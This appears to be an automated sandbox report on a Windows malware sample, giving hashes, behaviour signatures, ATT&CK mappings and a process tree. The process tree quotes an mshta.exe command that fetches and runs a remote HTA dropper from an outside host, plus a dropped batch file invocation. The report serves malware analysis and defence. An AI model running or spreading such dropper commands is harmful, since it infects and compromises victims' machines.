Analysis

  • max time kernel
    43s
  • max time network
    44s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    21-04-2024 13:34

Errors

Reason
Machine shutdown: "{\"level\":\"info\",\"time\":\"2024-04-21T13:35:01Z\",\"message\":\"Dirty snapshot: /var/lib/sandbox/hatchvm/win7-20231129-en/instance_27-dirty.qcow2\"}"

General

  • Target

    ff643925ab1766e8824df0ea24bd360d_JaffaCakes118.exe

  • Size

    319KB

  • MD5

    ff643925ab1766e8824df0ea24bd360d

  • SHA1

    51d1d7776a51c091dbce0941d05bacf17558ed29

  • SHA256

    3383331a239a845adc5491cae5c4c5f506d995512f39cf3274bd2c9a02ee7aef

  • SHA512

    413ef73606c2d8ec0ccd4307da86e0ca2aa5825ee9f072b5376920cfd06d4a752af92c29e54d2b6568432a28c453c8442eab492659bb7562bcd401b5063c4b0d

  • SSDEEP

    6144:IcZHcar1Y1F4kTtCE8y7gSCpgUXGqyzLlxE95/wWT2tHR+weaZ:fHNWw7dy7gS9UX2YPS2a

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://rerererererere.com/inst.php?id=forbidden

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ff643925ab1766e8824df0ea24bd360d_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\ff643925ab1766e8824df0ea24bd360d_JaffaCakes118.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2232
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" http://rerererererere.com/inst.php?id=forbidden
      2⤵
      • Modifies Internet Explorer settings
      PID:2368
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Roaming\dgfdgsdf.bat" "
      2⤵
        PID:1176
    • C:\Windows\system32\LogonUI.exe
      "LogonUI.exe" /flags:0x0
      1⤵
        PID:3036
      • C:\Windows\system32\LogonUI.exe
        "LogonUI.exe" /flags:0x1
        1⤵
          PID:1048

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Persistence

        Boot or Logon Autostart Execution

        1
        T1547

        Winlogon Helper DLL

        1
        T1547.004

        Privilege Escalation

        Boot or Logon Autostart Execution

        1
        T1547

        Winlogon Helper DLL

        1
        T1547.004

        Defense Evasion

        Modify Registry

        2
        T1112

        Discovery

        System Information Discovery

        1
        T1082

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\dgfdgsdf.bat
          Filesize

          263B

          MD5

          732174cfd42a063da51e7235505aae39

          SHA1

          532ac8a1c574c5a0e067889e5984415ef886ced3

          SHA256

          bcad8623dd34eb3dad92d91f52924051fca01fae4acf00ce97887071b3ff8688

          SHA512

          a150d580ea302feb0712bf7baba29b2bc47cc03d310df5aee7c4661bd2674d6357ee05ae12c6a79ceeae7b1aa09440d17d7a21ee64b60d9f9378ed09d03218c1

        • memory/1048-21-0x0000000002B30000-0x0000000002B31000-memory.dmp
          Filesize

          4KB

        • memory/2232-15-0x0000000000400000-0x000000000062F000-memory.dmp
          Filesize

          2.2MB

        • memory/2232-2-0x0000000003890000-0x00000000038A0000-memory.dmp
          Filesize

          64KB

        • memory/2232-13-0x0000000000400000-0x000000000062F000-memory.dmp
          Filesize

          2.2MB

        • memory/2232-14-0x0000000000400000-0x000000000062F000-memory.dmp
          Filesize

          2.2MB

        • memory/2232-0-0x0000000000400000-0x000000000062F000-memory.dmp
          Filesize

          2.2MB

        • memory/2232-16-0x0000000003890000-0x00000000038A0000-memory.dmp
          Filesize

          64KB

        • memory/2232-17-0x0000000000400000-0x000000000062F000-memory.dmp
          Filesize

          2.2MB

        • memory/2232-18-0x0000000000400000-0x000000000062F000-memory.dmp
          Filesize

          2.2MB

        • memory/2232-19-0x0000000000400000-0x000000000062F000-memory.dmp
          Filesize

          2.2MB

        • memory/2232-1-0x0000000000230000-0x0000000000231000-memory.dmp
          Filesize

          4KB

        • memory/3036-20-0x0000000002E90000-0x0000000002E91000-memory.dmp
          Filesize

          4KB